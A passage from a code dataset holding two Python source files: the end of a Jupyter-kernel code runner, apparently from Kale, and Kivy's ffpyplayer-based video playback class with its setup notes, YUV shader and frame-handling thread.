traceback = map(remove_ansi_color_sequences,
content['traceback'])
sys.stderr.write('\n'.join(traceback) + '\n')
if exit_on_error:
# when receiving an error from the kernel, we don't want
# to just print the exception to stderr, otherwise the
# pipeline step would complete successfully.
# kill sends the signal to the specific pid (main thread)
os.kill(os.getpid(), signal.SIGUSR1)
def run_code(source: tuple, kernel_name='python3'):
"""Run code blocks inside a jupyter kernel.
Args:
source (tuple): source code blocks
kernel_name: name of the kernel (form the kernel spec) to be created
"""
import IPython
if pkg_version.parse(IPython.__version__) < pkg_version.parse('7.6.0'):
raise RuntimeError("IPython version {} not supported."
" Kale requires at least version 7.6.0."
.format(IPython.__version__))
# new notebook
spec = get_kernel_spec(kernel_name)
notebook = nbformat.v4.new_notebook(metadata={
'kernelspec': {
'display_name': spec.display_name,
'language': spec.language,
'name': kernel_name,
}})
notebook.cells = [nbformat.v4.new_code_cell(s) for s in source]
# these parameters are passed to nbconvert.ExecutePreprocessor
jupyter_execute_kwargs = dict(
timeout=-1, allow_errors=True, store_widget_state=True)
resources = {}
# cwd: If supplied, the kernel will run in this directory
# resources['metadata'] = {'path': cwd}
ep = ExecutePreprocessor(**jupyter_execute_kwargs)
km = ep.kernel_manager_class(kernel_name=kernel_name, config=ep.config)
# start_kernel supports several additional arguments via **kw
km.start_kernel(extra_arguments=ep.extra_arguments)
kc = km.client()
kc.start_channels()
try:
kc.wait_for_ready(timeout=60)
except RuntimeError:
kc.stop_channels()
raise
kc.allow_stdin = False
def signal_handler(_signal, _frame):
raise KaleKernelException()
# this signal is used by the thread in case an error message is received
# by the kernel. Running sys.exit() inside the thread would terminate
# just the thread itself, not the main process. Calling os._exit() can be
# dangerous as the process is killed instantly (files and connections are
# not closed, for example). With a signal we can capture the ExitCommand
# exception from the main process and exit gracefully.
signal.signal(signal.SIGUSR1, signal_handler)
# start separate thread in to capture and print stdout, stderr, errors.
# daemon mode will make the watcher thread die when the main one returns.
x = threading.Thread(target=capture_streams, args=(kc, True,), daemon=True)
x.start()
try:
# start preprocessor: run each code cell and capture the output
ep.preprocess(notebook, resources, km=km)
except KaleKernelException:
# exit gracefully with error
sys.exit(-1)
# Give some time to the stream watcher thread to receive all messages from
# the kernel before shutting down.
time.sleep(1)
km.shutdown_kernel()
result = process_outputs(notebook.cells)
return result
|
video_ffpyplayer.py
|
'''
FFmpeg based video abstraction
==============================
To use, you need to install ffpyplayer and have a compiled ffmpeg shared
library.
https://github.com/matham/ffpyplayer
The docs there describe how to set this up. But briefly, first you need to
compile ffmpeg using the shared flags while disabling the static flags (you'll
probably have to set the fPIC flag, e.g. CFLAGS=-fPIC). Here are some
instructions: https://trac.ffmpeg.org/wiki/CompilationGuide. For Windows, you
can download compiled GPL binaries from http://ffmpeg.zeranoe.com/builds/.
Similarly, you should download SDL2.
Now, you should have ffmpeg and sdl directories. In each, you should have an
'include', 'bin' and 'lib' directory, where e.g. for Windows, 'lib' contains
the .dll.a files, while 'bin' contains the actual dlls. The 'include' directory
holds the headers. The 'bin' directory is only needed if the shared libraries
are not already in the path. In the environment, define FFMPEG_ROOT and
SDL_ROOT, each pointing to the ffmpeg and SDL directories respectively. (If
you're using SDL2, the 'include' directory will contain an 'SDL2' directory,
which then holds the headers).
Once defined, download the ffpyplayer git repo and run
python setup.py build_ext --inplace
Finally, before running you need to ensure that ffpyplayer is in python's path.
..Note::
When kivy exits by closing the window while the video is playing,
it appears that the __del__method of VideoFFPy
is not called. Because of this, the VideoFFPy object is not
properly deleted when kivy exits. The consequence is that because
MediaPlayer creates internal threads which do not have their daemon
flag set, when the main threads exists, it'll hang and wait for the other
MediaPlayer threads to exit. But since __del__ is not called to delete the
MediaPlayer object, those threads will remain alive, hanging kivy. What
this means is that you have to be sure to delete the MediaPlayer object
before kivy exits by setting it to None.
'''
__all__ = ('VideoFFPy', )
try:
import ffpyplayer
from ffpyplayer.player import MediaPlayer
from ffpyplayer.tools import set_log_callback, get_log_callback
except:
raise
from threading import Thread
from kivy.clock import Clock, mainthread
from kivy.logger import Logger
from kivy.core.video import VideoBase
from kivy.graphics import Rectangle, BindTexture
from kivy.graphics.texture import Texture
from kivy.graphics.fbo import Fbo
from kivy.weakmethod import WeakMethod
import time
Logger.info('VideoFFPy: Using ffpyplayer {}'.format(ffpyplayer.version))
logger_func = {'quiet': Logger.critical, 'panic': Logger.critical,
'fatal': Logger.critical, 'error': Logger.error,
'warning': Logger.warning, 'info': Logger.info,
'verbose': Logger.debug, 'debug': Logger.debug}
def _log_callback(message, level):
message = message.strip()
if message:
logger_func[level]('ffpyplayer: {}'.format(message))
if not get_log_callback():
set_log_callback(_log_callback)
class VideoFFPy(VideoBase):
YUV_RGB_FS = """
$HEADER$
uniform sampler2D tex_y;
uniform sampler2D tex_u;
uniform sampler2D tex_v;
void main(void) {
float y = texture2D(tex_y, tex_coord0).r;
float u = texture2D(tex_u, tex_coord0).r - 0.5;
float v = texture2D(tex_v, tex_coord0).r - 0.5;
float r = y + 1.402 * v;
float g = y - 0.344 * u - 0.714 * v;
float b = y + 1.772 * u;
gl_FragColor = vec4(r, g, b, 1.0);
}
"""
_trigger = None
def __init__(self, **kwargs):
self._ffplayer = None
self._thread = None
self._next_frame = None
self._seek_queue = []
self._ffplayer_need_quit = False
self._trigger = Clock.create_trigger(self._redraw)
super(VideoFFPy, self).__init__(**kwargs)
def __del__(self):
self.unload()
def _player_callback(self, selector, value):
if self._ffplayer is None:
return
if selector == 'quit':
def close(*args):
self.unload()
Clock.schedule_once(close, 0)
def _get_position(self):
if self._ffplayer is not None:
return self._ffplayer.get_pts()
return 0
def _set_position(self, pos):
self.seek(pos)
def _set_volume(self, volume):
self._volume = volume
if self._ffplayer:
self._ffplayer.set_volume(self._volume)
def _get_duration(self):
if self._ffplayer is None:
return 0
return self._ffplayer.get_metadata()['duration']
@mainthread
def _do_eos(self):
if self.eos == 'pause':
self.pause()
elif self.eos == 'stop':
self.stop()
elif self.eos == 'loop':
self.position = 0
self.dispatch('on_eos')
@mainthread
def _change_state(self, state):
self._state = state
def _redraw(self, *args):
if not self._ffplayer:
return
next_frame = self._next_frame
if not next_frame:
return
img, pts = next_frame
if img.get_size() != self._size or self._texture is None:
self._size = w, h = img.get_size()
if self._out_fmt == 'yuv420p':
w2 = int(w / 2)
h2 = int(h / 2)
self._tex_y = Texture.create(
size=(w, h), colorfmt='luminance')
self._tex_u = Texture.create(
size=(w2, h2), colorfmt='luminance')
self._tex_v = Texture.create(
size=(w2, h2), colorfmt='luminance')
self._fbo = fbo = Fbo(size=self._size)
with fbo:
BindTexture(texture=self._tex_u, index=1)
BindTexture(texture=self._tex_v, index=2)
Rectangle(size=fbo.size, texture=self._tex_y)
fbo.shader.fs = VideoFFPy.YUV_RGB_FS
fbo['tex_y'] = 0
fbo['tex_u'] = 1
fbo['tex_v'] = 2
self._texture = fbo.texture
else:
self._texture = Texture.create(size=self._size,
colorfmt='rgba')
# XXX FIXME
# self.texture.add_reload_observer(self.reload_buffer)
self._texture.flip_vertical()
self.dispatch('on_load')
if self._texture:
if self._out_fmt == 'yuv420p':
dy, du, dv, _ = img.to_memoryview()
if dy and du and dv:
self._tex_y.blit_buffer(dy, colorfmt='luminance')
self._tex_u.blit_buffer(du, colorfmt='luminance')
self._tex_v.blit_buffer(dv, colorfmt='luminance')
self._fbo.ask_update()
self._fbo.draw()
else:
self._texture.blit_buffer(
img.to_memoryview()[0], colorfmt='rgba')
self.dispatch('on_frame')
def _next_frame_run(self):
ffplayer = self._ffplayer
sleep = time.sleep
trigger = self._trigger
did_dispatch_eof = False
seek_queue = self._seek_queue
# fast path, if the source video is yuv420p, we'll use a glsl shader
# for buffer conversion to rgba
while not self._ffplayer_need_quit:
src_pix_fmt = ffplayer.get_metadata().get('src_pix_fmt')
if not src_pix_fmt:
sleep(0.005)
continue
if src_pix_fmt == 'yuv420p':
self._out_fmt = 'yuv420p'
ffplayer.set_output_pix_fmt(self._out_fmt)
self._ffplayer.toggle_pause()
break
if self._ffplayer_need_quit:
return
# wait until loaded or failed, shouldn't take long, but just to make
# sure metadata is available.
s = time.clock()
while not self._ffplayer_need_quit:
if ffplayer.get_metadata()['src_vid_size'] != (0, 0):
break
# XXX if will fail later then?
if time.clock() - s > 10.:
break
sleep(0.005)
if self._ffplayer_need_quit:
return
# we got all the informations, now, get the frames :)
self._change_state('playing')
while not self._ffplayer_need_quit:
if seek_queue:
vals = seek_queue[:]
del seek_queue[:len(vals)]
ffplayer.seek(
vals[-1] * ffplayer.get_metadata()['duration'],
relative=False)
self._next_frame = None
t1 = time.time()
frame, val = ffplayer.get_frame()
t2 = time.time()
if val == 'eof':
sleep(0.2)
if not did_dispatch_eof:
self._do_eos()
did_dispatch_eof = True
elif val == 'paused':
did_dispatch_eof = False
sleep(0.2)
else:
did_dispatch_eof = False
if frame:
self._next_frame = frame
trigger()
else:
val = val if val else (1 / 30.)
sleep(val)
def seek(self, percent):
if self._ffplayer is None:
return
self._seek_queue.append(percent)
def stop(self):
self.unload()
def pause(self):
if self._ffplayer and self._state != 'paused':
self._ffplayer.toggle_pause()
self._state = 'paused'
def play(self):
if self._ffplayer and self._state == 'paused':
self._ffplayer.toggle_pause()
self._state = 'playing'
return
self.load()
self._out_fmt = 'rgba'
ff_opts = {
'paused': True,
'out_fmt': self._out_fmt
}
self._ffplayer = MediaPlayer(
self._filename, callback=self._player_callback,
thread_lib='SDL',
loglevel='info', ff_opts=ff_opts)
self._ffplayer.set_volume(self._volume)
self._thread = Thread(target=self._next_frame_run, name='Next frame')
self._thread.daemon = True
self._thread.start()
def load(self):
self.unload()
def unload(self):
if self._trigger is not None:
self._trigger.cancel()
self._ffplayer_need_quit = True
if self._thread:
self._thread.join()
self._thread = None
if self._ffplayer:
self._ffplayer = None
self._next_frame = None
self._size = (0, 0)
self._state = ''
self._ffplayer_need_quit = False
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.